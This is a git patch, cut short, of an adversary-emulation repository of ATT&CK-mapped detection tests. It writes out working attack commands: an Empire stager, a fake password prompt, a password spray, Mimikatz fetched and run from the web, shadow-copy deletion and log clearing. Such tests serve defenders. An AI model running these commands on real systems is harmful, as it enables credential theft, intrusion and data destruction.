From ac8dd2cfecb6e183eb2e0f74e5f76465fcef579c Mon Sep 17 00:00:00 2001 From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com> Date: Wed, 11 Oct 2017 10:35:17 -0700 Subject: [PATCH] Initial Commit Initial Checkin --- LICENSE.txt | 22 +++ Linux/Credential_Access/Bash_History.md | 6 + Linux/Linux.md | 21 +++ Linux/Persistence/Cron_Job.md | 6 + Mac/Credential_Access/Bash_History.md | 6 + Mac/Execution/AppleScript.md | 18 +++ Mac/Mac.md | 26 ++++ Mac/Persistence/Cron_Job.md | 6 + README.md | 13 ++ Windows/Collection/Clipboard_Data.md | 16 +++ Windows/Credential_Access/Brute_Force.md | 16 +++ Windows/Credential_Access/Create Account.md | 35 +++++ .../Credential_Access/Credential Dumping.md | 36 +++++ Windows/Defense Evasion/File_Deletion.md | 31 ++++ .../Indicator_Removal_on_Host.md | 13 ++ Windows/Discovery/Account_Discovery.md | 47 ++++++ .../Discovery/File_and_Directory_Discovery.md | 12 ++ Windows/Discovery/Query Registry.md | 46 ++++++ Windows/Discovery/Remote System Discovery.md | 19 +++ .../Discovery/System Information Discovery.md | 16 +++ .../Discovery/System Owner-User Discovery.md | 19 +++ Windows/Execution/Bitsadmin.md | 5 + Windows/Execution/InstallUtil.md | 16 +++ Windows/Execution/PowerShell.md | 68 +++++++++ Windows/Execution/RegsvcsRegasm.md | 22 +++ Windows/Execution/Regsvr32.md | 16 +++ Windows/Execution/Rundll32.md | 13 ++ .../Execution/Trusted_Developer_Utilities.md | 12 ++ .../Windows_Management_Instrumentation.md | 45 ++++++ .../Lateral Movement/Windows Admin Shares.md | 15 ++ .../Windows Remote Management.md | 33 +++++ .../Payloads/AllTheThings/AllTheThingsx64.dll | Bin 0 -> 7168 bytes .../Payloads/AllTheThings/AllTheThingsx86.dll | Bin 0 -> 7168 bytes Windows/Payloads/AllTheThings/Program.cs | 134 ++++++++++++++++++ Windows/Payloads/AllTheThings/test.bat | 18 +++ Windows/Payloads/AppInitInject.reg | 6 + .../COMHijackScripts/AtomicRedTeam.sct | 22 +++ .../Payloads/COMHijackScripts/COMHijack.reg | 23 +++ .../COMHijackScripts/COMHijackCleanup.reg | 5 + Windows/Payloads/COMHijackScripts/test.bat | 3 + Windows/Payloads/DllInject/DLLInjection.cs | 84 +++++++++++ Windows/Payloads/DllInject/MessageBox32.dll | Bin 0 -> 8704 bytes Windows/Payloads/DllInject/MessageBox64.dll | Bin 0 -> 10752 bytes Windows/Payloads/InstallUtilBypass.cs | 45 ++++++ Windows/Payloads/MSBuildBypass.csproj | 47 ++++++ Windows/Payloads/RegSvcsRegAsmBypass.cs | 50 +++++++ Windows/Payloads/RegSvr32.sct | 23 +++ .../UACBypass/Invoke-EventVwrBypass.ps1 | 92 ++++++++++++ Windows/Persistence/Accessibility_Features.md | 31 ++++ Windows/Persistence/AppInit_DLLs.md | 24 ++++ Windows/Persistence/Application_Shimming.md | 17 +++ Windows/Persistence/Authentication_Package.md | 5 + .../Change_Default_File_Association.md | 13 ++ .../Component_Object_Model_Hijacking.md | 17 +++ Windows/Persistence/Netsh_Helper_DLL.md | 53 +++++++ Windows/Persistence/Scheduled_Task.md | 9 ++ ...ment_Instrumentation_Event_Subscription.md | 53 +++++++ .../Bypass_User_Account_Control.md | 10 ++ Windows/Privilege Escalation/DLL Injection.md | 17 +++ .../Privilege Escalation/Scheduled Task.md | 34 +++++ Windows/Windows.md | 40 ++++++ 61 files changed, 1550 insertions(+) create mode 100644 LICENSE.txt create mode 100644 Linux/Credential_Access/Bash_History.md create mode 100644 Linux/Linux.md create mode 100644 Linux/Persistence/Cron_Job.md create mode 100644 Mac/Credential_Access/Bash_History.md create mode 100644 Mac/Execution/AppleScript.md create mode 100644 Mac/Mac.md create mode 100644 Mac/Persistence/Cron_Job.md create mode 100644 README.md create mode 100644 Windows/Collection/Clipboard_Data.md create mode 100644 Windows/Credential_Access/Brute_Force.md create mode 100644 Windows/Credential_Access/Create Account.md create mode 100644 Windows/Credential_Access/Credential Dumping.md create mode 100644 Windows/Defense Evasion/File_Deletion.md create mode 100644 Windows/Defense Evasion/Indicator_Removal_on_Host.md create mode 100644 Windows/Discovery/Account_Discovery.md create mode 100644 Windows/Discovery/File_and_Directory_Discovery.md create mode 100644 Windows/Discovery/Query Registry.md create mode 100644 Windows/Discovery/Remote System Discovery.md create mode 100644 Windows/Discovery/System Information Discovery.md create mode 100644 Windows/Discovery/System Owner-User Discovery.md create mode 100644 Windows/Execution/Bitsadmin.md create mode 100644 Windows/Execution/InstallUtil.md create mode 100644 Windows/Execution/PowerShell.md create mode 100644 Windows/Execution/RegsvcsRegasm.md create mode 100644 Windows/Execution/Regsvr32.md create mode 100644 Windows/Execution/Rundll32.md create mode 100644 Windows/Execution/Trusted_Developer_Utilities.md create mode 100644 Windows/Execution/Windows_Management_Instrumentation.md create mode 100644 Windows/Lateral Movement/Windows Admin Shares.md create mode 100644 Windows/Lateral Movement/Windows Remote Management.md create mode 100755 Windows/Payloads/AllTheThings/AllTheThingsx64.dll create mode 100755 Windows/Payloads/AllTheThings/AllTheThingsx86.dll create mode 100755 Windows/Payloads/AllTheThings/Program.cs create mode 100755 Windows/Payloads/AllTheThings/test.bat create mode 100644 Windows/Payloads/AppInitInject.reg create mode 100755 Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct create mode 100755 Windows/Payloads/COMHijackScripts/COMHijack.reg create mode 100755 Windows/Payloads/COMHijackScripts/COMHijackCleanup.reg create mode 100755 Windows/Payloads/COMHijackScripts/test.bat create mode 100755 Windows/Payloads/DllInject/DLLInjection.cs create mode 100755 Windows/Payloads/DllInject/MessageBox32.dll create mode 100755 Windows/Payloads/DllInject/MessageBox64.dll create mode 100644 Windows/Payloads/InstallUtilBypass.cs create mode 100644 Windows/Payloads/MSBuildBypass.csproj create mode 100644 Windows/Payloads/RegSvcsRegAsmBypass.cs create mode 100644 Windows/Payloads/RegSvr32.sct create mode 100644 Windows/Payloads/UACBypass/Invoke-EventVwrBypass.ps1 create mode 100644 Windows/Persistence/Accessibility_Features.md create mode 100644 Windows/Persistence/AppInit_DLLs.md create mode 100644 Windows/Persistence/Application_Shimming.md create mode 100644 Windows/Persistence/Authentication_Package.md create mode 100644 Windows/Persistence/Change_Default_File_Association.md create mode 100644 Windows/Persistence/Component_Object_Model_Hijacking.md create mode 100644 Windows/Persistence/Netsh_Helper_DLL.md create mode 100644 Windows/Persistence/Scheduled_Task.md create mode 100644 Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md create mode 100644 Windows/Privilege Escalation/Bypass_User_Account_Control.md create mode 100644 Windows/Privilege Escalation/DLL Injection.md create mode 100644 Windows/Privilege Escalation/Scheduled Task.md create mode 100644 Windows/Windows.md diff --git a/LICENSE.txt b/LICENSE.txt new file mode 100644 index 00000000..cad34f8e --- /dev/null +++ b/LICENSE.txt @@ -0,0 +1,22 @@ + +The MIT License + +Copyright (c) 2016 Red Canary, Inc. + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/Linux/Credential_Access/Bash_History.md b/Linux/Credential_Access/Bash_History.md new file mode 100644 index 00000000..b775a8d3 --- /dev/null +++ b/Linux/Credential_Access/Bash_History.md @@ -0,0 +1,6 @@ +# Bash History + +MITRE ATT&CK Technique: [T1139](https://attack.mitre.org/wiki/Technique/T1139) + + + cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt diff --git a/Linux/Linux.md b/Linux/Linux.md new file mode 100644 index 00000000..13651588 --- /dev/null +++ b/Linux/Linux.md @@ -0,0 +1,21 @@ +## MITRE ATT&CK Matrix - Linux + +| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | +|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| +| .bash_profile and .bashrc | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | Application Deployment Software | Command-Line Interface | Audio Capture | Automated Exfiltration | Commonly Used Port | +| Bootkit | Setuid and Setgid | Clear Command History | Brute Force | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media | +| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | Create Account | Permission Groups Discovery | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy | +| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Process Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | +| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | System Information Discovery | Third-party Software | Space after Filename | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | +| Redundant Access | | HISTCONTROL | Input Capture | System Network Configuration Discovery | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | +| Trap | | Hidden Files and Directories | Network Sniffing | System Network Connections Discovery | | Trap | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | +| Valid Accounts | | Indicator Removal from Tools | Private Keys | System Owner/User Discovery | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels | +| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels | +| | | Install Root Certificate | | | | | | | Multiband Communication | +| | | Masquerading | | | | | | | Multilayer Encryption | +| | | Redundant Access | | | | | | | Remote File Copy | +| | | Scripting | | | | | | | Standard Application Layer Protocol | +| | | Space after Filename | | | | | | | Standard Cryptographic Protocol | +| | | Timestomp | | | | | | | Standard Non-Application Layer Protocol | +| | | Valid Accounts | | | | | | | Uncommonly Used Port | +| | | | | | | | | | Web Service | diff --git a/Linux/Persistence/Cron_Job.md b/Linux/Persistence/Cron_Job.md new file mode 100644 index 00000000..bd2891b4 --- /dev/null +++ b/Linux/Persistence/Cron_Job.md @@ -0,0 +1,6 @@ +# Bash History + +MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168) + + + echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil diff --git a/Mac/Credential_Access/Bash_History.md b/Mac/Credential_Access/Bash_History.md new file mode 100644 index 00000000..b775a8d3 --- /dev/null +++ b/Mac/Credential_Access/Bash_History.md @@ -0,0 +1,6 @@ +# Bash History + +MITRE ATT&CK Technique: [T1139](https://attack.mitre.org/wiki/Technique/T1139) + + + cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt diff --git a/Mac/Execution/AppleScript.md b/Mac/Execution/AppleScript.md new file mode 100644 index 00000000..a8d17b59 --- /dev/null +++ b/Mac/Execution/AppleScript.md @@ -0,0 +1,18 @@ +# AppleScript + +MITRE ATT&CK Technique: [T1155](https://attack.mitre.org/wiki/Technique/T1155) + +## One-Liners + +### Execute Shell Scripts + + osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\" | python &"" + +https://github.com/EmpireProject/Empire + + +### Prompt User for Password (Local Phishing) + + osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' + +http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html diff --git a/Mac/Mac.md b/Mac/Mac.md new file mode 100644 index 00000000..0a178e7f --- /dev/null +++ b/Mac/Mac.md @@ -0,0 +1,26 @@ +## MITRE ATT&CK Matrix - Mac + + +| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | +|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| +| .bash_profile and .bashrc | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Automated Collection | Automated Exfiltration | Commonly Used Port | +| [Cron Job](Persistence/Cron_Job.md) | Exploitation of Vulnerability | Clear Command History | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Clipboard Data | Data Compressed | Communication Through Removable Media | +| Dylib Hijacking | Launch Daemon | Code Signing | Create Account | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Data Staged | Data Encrypted | Connection Proxy | +| Hidden Files and Directories | Plist Modification | Disabling Security Tools | Credentials in Files | Network Share Discovery | Logon Scripts | Launchctl | Data from Local System | Data Transfer Size Limits | Custom Command and Control Protocol | +| LC_LOAD_DYLIB Addition | Setuid and Setgid | Exploitation of Vulnerability | Exploitation of Vulnerability | Permission Groups Discovery | Remote File Copy | Scripting | Data from Network Shared Drive | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | +| Launch Agent | Startup Items | File Deletion | Input Capture | Process Discovery | Remote Services | Source | Data from Removable Media | Exfiltration Over Command and Control Channel | Data Encoding | +| Launch Daemon | Sudo | Gatekeeper Bypass | Input Prompt | Remote System Discovery | Third-party Software | Space after Filename | Input Capture | Exfiltration Over Other Network Medium | Data Obfuscation | +| Launchctl | Valid Accounts | HISTCONTROL | Keychain | Security Software Discovery | | Third-party Software | Screen Capture | Exfiltration Over Physical Medium | Fallback Channels | +| Login Item | Web Shell | Hidden Files and Directories | Network Sniffing | System Information Discovery | | Trap | | Scheduled Transfer | Multi-Stage Channels | +| Logon Scripts | | Hidden Users | Private Keys | System Network Configuration Discovery | | | | | Multiband Communication | +| Plist Modification | | Hidden Window | Securityd Memory | System Network Connections Discovery | | | | | Multilayer Encryption | +| Rc.common | | Indicator Removal from Tools | Two-Factor Authentication Interception | System Owner/User Discovery | | | | | Remote File Copy | +| Re-opened Applications | | Indicator Removal on Host | | | | | | | Standard Application Layer Protocol | +| Redundant Access | | LC_MAIN Hijacking | | | | | | | Standard Cryptographic Protocol | +| Startup Items | | Launchctl | | | | | | | Standard Non-Application Layer Protocol | +| Trap | | Masquerading | | | | | | | Uncommonly Used Port | +| Valid Accounts | | Plist Modification | | | | | | | Web Service | +| Web Shell | | Redundant Access | | | | | | | | +| | | Scripting | | | | | | | | +| | | Space after Filename | | | | | | | | +| | | Valid Accounts | | | | | | | | diff --git a/Mac/Persistence/Cron_Job.md b/Mac/Persistence/Cron_Job.md new file mode 100644 index 00000000..bd2891b4 --- /dev/null +++ b/Mac/Persistence/Cron_Job.md @@ -0,0 +1,6 @@ +# Bash History + +MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168) + + + echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil diff --git a/README.md b/README.md new file mode 100644 index 00000000..f98324c3 --- /dev/null +++ b/README.md @@ -0,0 +1,13 @@ +# atomic-red-team +Small and highly portable detection tests mapped to the Mitre ATT&CK +Framework. + +[Windows MITRE ATT&CK Matrix](Windows/Windows.md) + +[Mac MITRE ATT&CK Matrix](Mac/Mac.md) + +[Linux MITRE ATT&CK Matrix](Linux/Linux.md) + +#### We did not create the MITRE ATT&CK Framework, we just think it is awesome and extensive. + +#### ATT&CK and ATT&CK Matrix are trademarks of The MITRE Corporation diff --git a/Windows/Collection/Clipboard_Data.md b/Windows/Collection/Clipboard_Data.md new file mode 100644 index 00000000..1077bc49 --- /dev/null +++ b/Windows/Collection/Clipboard_Data.md @@ -0,0 +1,16 @@ +# Clipboard Data + +MITRE ATT&CK Technique: [T1115](https://attack.mitre.org/wiki/Technique/T1115) + + + +## cmd + + | clip + clip < readme.txt + +## PowerShell + + echo Get-Process > things.txt + powershell + Get-Clipboard | iex diff --git a/Windows/Credential_Access/Brute_Force.md b/Windows/Credential_Access/Brute_Force.md new file mode 100644 index 00000000..4ce257ed --- /dev/null +++ b/Windows/Credential_Access/Brute_Force.md @@ -0,0 +1,16 @@ +# Brute Force + +MITRE ATT&CK Technique: [T1110](https://attack.mitre.org/wiki/Technique/T1110) + +## net.exe + +### Password Spray + + + net user /domain > DomainUsers.txt + echo "Password1" >> pass.txt + echo "1q2w3e4r" >> pass.txt + +Execute: + + @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL diff --git a/Windows/Credential_Access/Create Account.md b/Windows/Credential_Access/Create Account.md new file mode 100644 index 00000000..1ede6677 --- /dev/null +++ b/Windows/Credential_Access/Create Account.md @@ -0,0 +1,35 @@ +# Create Account + +MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136) + +## Net.exe + +Local user add: + + Net user /add Trevor SmshBgr123 + +Add new user to localgroup: + + net localgroup administrators jack /add + +Domain add: + + net user username \password \domain + +Add user to Active Directory: + + dsadd user CN=John,CN=Users,DC=it,DC=uk,DC=savilltech,DC=com -samid John -pwd Pa55word123 + +# Powershell 5.1 + +The following requires [Powershell 5.1](https://www.microsoft.com/en-us/download/details.aspx?id=54616) + +Additional information [here](https://4sysops.com/archives/the-new-local-user-and-group-cmdlets-in-powershell-5-1/) + +## Add User + + New-LocalUser -FullName 'Trevor R.' -Name 'Trevor' -Password SmshBgr ‑Description 'Pwnage account' + +## Create a group + + New-LocalGroup -Name 'Testgroup' -Description 'Testing group' diff --git a/Windows/Credential_Access/Credential Dumping.md b/Windows/Credential_Access/Credential Dumping.md new file mode 100644 index 00000000..22a2221a --- /dev/null +++ b/Windows/Credential_Access/Credential Dumping.md @@ -0,0 +1,36 @@ +# Credential Dumping + +MITRE ATT&CK Technique: [T1003](https://attack.mitre.org/wiki/Technique/T1003) + + +## Powershell Mimikatz + +Input: + + powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" + +## Gsecdump + +[Gsecdump](https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5) + +Input: + + gsecdump -a + +## Windows Credential Editor + +[Windows Credential Editor](http://www.ampliasecurity.com/research/windows-credentials-editor/) + +Input: + + wce -o output.txt + +Output: + + C:\>wce -o output.txt + WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) + Use -h for help. + + C:\>type output.txt + test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102 + C:\> diff --git a/Windows/Defense Evasion/File_Deletion.md b/Windows/Defense Evasion/File_Deletion.md new file mode 100644 index 00000000..fd2736af --- /dev/null +++ b/Windows/Defense Evasion/File_Deletion.md @@ -0,0 +1,31 @@ +# File Deletion + +MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107) + +## cmd + + del /f filename + rmdir example + +## PowerShell + + Remove-Item –path c:\testfolder –recurse + +## vssadmin + + vssadmin.exe Delete Shadows /All /Quiet + + +## wmic + + wmic shadowcopy delete + +## bcdedit + + bcdedit /set {default} bootstatuspolicy ignoreallfailures + + bcdedit /set {default} recoveryenabled no + +## wbadmin + + wbadmin delete catalog -quiet diff --git a/Windows/Defense Evasion/Indicator_Removal_on_Host.md b/Windows/Defense Evasion/Indicator_Removal_on_Host.md new file mode 100644 index 00000000..635e4f78 --- /dev/null +++ b/Windows/Defense Evasion/Indicator_Removal_on_Host.md @@ -0,0 +1,13 @@ +## Indicator Removal on Host + +MITRE ATT&CK Technique: [T1070](https://attack.mitre.org/wiki/Technique/T1070) + +## Wevtutil + +Clear system logs + + wevtutil cl System + +Clear Security logs + + wevtutil cl Security diff --git a/Windows/Discovery/Account_Discovery.md b/Windows/Discovery/Account_Discovery.md new file mode 100644 index 00000000..bfc0c719 --- /dev/null +++ b/Windows/Discovery/Account_Discovery.md @@ -0,0 +1,47 @@ +## Account Discovery + +MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087) + + +### Net user and group Enumeration + +Domain Group Enumeration: + + net groups "domain administrators" /domain + +Domain User Enumeration: + + net user /domain + +Local Group Enumeration: + + net localgroup "administrators" + +Local User Enumeration: + + net user + + +## wmic.exe + +### Reconnaissance + +Input: + + wmic useraccount get /ALL + +Input: + + wmic process get caption,executablepath,commandline + +Input: + + wmic qfe get description,installedOn /format:csv + +Input: + + wmic /node:"192.168.0.1" service where (caption like "%sql server (%") + +Input: + + get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" diff --git a/Windows/Discovery/File_and_Directory_Discovery.md b/Windows/Discovery/File_and_Directory_Discovery.md new file mode 100644 index 00000000..23b7aef2 --- /dev/null +++ b/Windows/Discovery/File_and_Directory_Discovery.md @@ -0,0 +1,12 @@ +## File and Directory Discovery + +MITRE ATT&CK Technique: [T1083](https://attack.mitre.org/wiki/Technique/T1083) + +### Directory listing + +Input: + + dir c:\ >> %temp%\download + dir "c:\Documents and Settings" >> %temp%\download + dir "c:\Program Files\" >> %temp%\download + dir d:\ >> %temp%\download diff --git a/Windows/Discovery/Query Registry.md b/Windows/Discovery/Query Registry.md new file mode 100644 index 00000000..4c0747c3 --- /dev/null +++ b/Windows/Discovery/Query Registry.md @@ -0,0 +1,46 @@ +## Query Registry + +MITRE ATT&CK Technique: [T1012](https://attack.mitre.org/wiki/Technique/T1012) + + + reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices + reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify + reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit + reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell + reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell + reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run + +Use the following command (as Administrator) to view the drivers configured to load during startup: + + reg query hklm\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$" + + Reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run + +Reference: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order + +Reference: https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services + + + + reg save HKLM\Security security.hive (Save security hive to a file) + reg save HKLM\System system.hive (Save system hive to a file) + reg save HKLM\SAM sam.hive (Save sam to a file)= + reg add [\\TargetIPaddr\] [RegDomain][ \Key ] + reg export [RegDomain]\[Key] [FileName] + reg import [FileName ] + reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values ) + +Reference: http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf + +Reference: https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf diff --git a/Windows/Discovery/Remote System Discovery.md b/Windows/Discovery/Remote System Discovery.md new file mode 100644 index 00000000..0bf5ddcf --- /dev/null +++ b/Windows/Discovery/Remote System Discovery.md @@ -0,0 +1,19 @@ +# Remote System Discovery + +MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018) + +### net.exe + + net view /domain + + net view + +### Ping + +Ping Sweep: + + for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i + +### ARP + + arp -a diff --git a/Windows/Discovery/System Information Discovery.md b/Windows/Discovery/System Information Discovery.md new file mode 100644 index 00000000..339cd1a0 --- /dev/null +++ b/Windows/Discovery/System Information Discovery.md @@ -0,0 +1,16 @@ +# Remote System Discovery + +MITRE ATT&CK Technique: [T1082](https://attack.mitre.org/wiki/Technique/T1082) + + +## SystemInfo + +Input: + + systeminfo + +## Reg + +Input: + + reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum diff --git a/Windows/Discovery/System Owner-User Discovery.md b/Windows/Discovery/System Owner-User Discovery.md new file mode 100644 index 00000000..832b2012 --- /dev/null +++ b/Windows/Discovery/System Owner-User Discovery.md @@ -0,0 +1,19 @@ +## System Owner/User Discovery + +MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018) + +### cmd.exe + + "cmd.exe" /C whoami + +### wmic.exe + + wmic useraccount get /ALL + +### quser + + quser /SERVER:"" + +### qwinsta + + qwinsta.exe" /server: diff --git a/Windows/Execution/Bitsadmin.md b/Windows/Execution/Bitsadmin.md new file mode 100644 index 00000000..ba8b7e37 --- /dev/null +++ b/Windows/Execution/Bitsadmin.md @@ -0,0 +1,5 @@ +## bitsadmin.exe + +Input: + + bitsadmin.exe /transfer /Download http://bit.ly/L3g1tCrad1e Default_File_Path.ps1 diff --git a/Windows/Execution/InstallUtil.md b/Windows/Execution/InstallUtil.md new file mode 100644 index 00000000..3cd2a2ad --- /dev/null +++ b/Windows/Execution/InstallUtil.md @@ -0,0 +1,16 @@ +## InstallUtil + +MITRE ATT&CK Technique: [T1118](https://attack.mitre.org/wiki/Technique/T1118) + +### Execution Examples: + +Input: + + x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + + x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + +## Test Script + 